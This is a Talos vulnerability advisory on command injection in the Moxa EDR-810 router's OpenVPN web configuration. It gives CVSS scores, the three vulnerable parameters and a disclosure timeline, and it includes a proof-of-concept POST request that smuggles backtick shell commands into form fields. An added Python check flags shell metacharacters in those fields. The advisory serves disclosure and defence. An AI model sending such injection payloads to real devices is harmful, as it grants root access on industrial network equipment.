Talos Intelligence (www.talosintelligence.com) - TALOS-2017-0482
Apr 13, 2018

Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities

CVSS2
Score: 9 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3
Score: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS
Score: 0.001 Low
Percentile: 38.8%

Summary

An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into various parameters in the "/goform/net_Web_get_value" URI to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

<https://www.moxa.com/product/EDR-810.htm>

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Details

Once logged in to the device's web interface, a user can configure OpenVPN via a POST to "/goform/net_Web_get_value". An attacker can inject commands via POST parameters. The web server runs as the root user, therefore injected commands also run as root.

CVE-2017-14432 - openvpnServer0_tmp

The following parameter is vulnerable to command injection.

Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: openvpnServer0_tmp=

CVE-2017-14433 - remoteNetwork0

The following parameter is vulnerable to command injection.

Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: remoteNetwork0=

CVE-2017-14434 - remoteNetmask0

The following parameter is vulnerable to command injection.

Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: remoteNetmask0=

Exploit Proof-of-Concept

In order to exploit this vulnerability the following POST request can be sent.

POST /goform/net_Web_get_value?SRV=SRV_OPENVPN_SERVER_USER HTTP/1.1
Host: 192.168.127.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.127.254/openvpn_user.asp
Cookie: NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60
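
Added example, not part of the Talos advisory or of Moxa's firmware: a check that a reverse proxy or log pipeline in front of the device could run on POST bodies sent to /goform/net_Web_get_value to flag the three parameters named above. The expected value formats (IPv4 address, dotted netmask, no shell metacharacters), the function names and the benign sample body are assumptions; the second sample is the request body shown in the advisory.

```python
import ipaddress
from urllib.parse import parse_qs

# Parameter names come from the advisory; the expected value formats are assumptions.
SHELL_META = set("`$;|&<>(){}\\'\"\n\r")

def _ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False

def _netmask(value):
    if not _ipv4(value):              # dotted form only, not a bare prefix length
        return False
    try:
        ipaddress.IPv4Network("0.0.0.0/" + value)
        return True
    except ValueError:
        return False

def _no_meta(value):
    return not (SHELL_META & set(value))

CHECKS = {
    "openvpnServer0_tmp": (_no_meta, "shell metacharacter"),
    "remoteNetwork0": (_ipv4, "not an IPv4 address"),
    "remoteNetmask0": (_netmask, "not an IPv4 netmask"),
}

def inspect_body(body):
    """Return {parameter: reason} for each advisory parameter that fails its check."""
    fields = parse_qs(body, keep_blank_values=True)   # also percent-decodes the values
    findings = {}
    for name, (ok, reason) in CHECKS.items():
        for value in fields.get(name, []):
            if value and not ok(value):
                findings[name] = reason
    return findings

# Constructed benign body (assumed field layout), then the body from the advisory.
BENIGN = ("openvpnServer0_tmp=AAAA%2Bvvvvv%2B10.0.0.0%2B255.255.255.0%2B"
          "&ovpnServerId=1&remoteNetwork0=10.0.0.0&remoteNetmask0=255.255.255.0")
ADVISORY_BODY = ("openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B"
                 "&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv"
                 "&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60")
```

The same allowlist logic applies server-side: validating each field against its expected format before it reaches any shell invocation removes the injection path regardless of which metacharacter is used.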

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
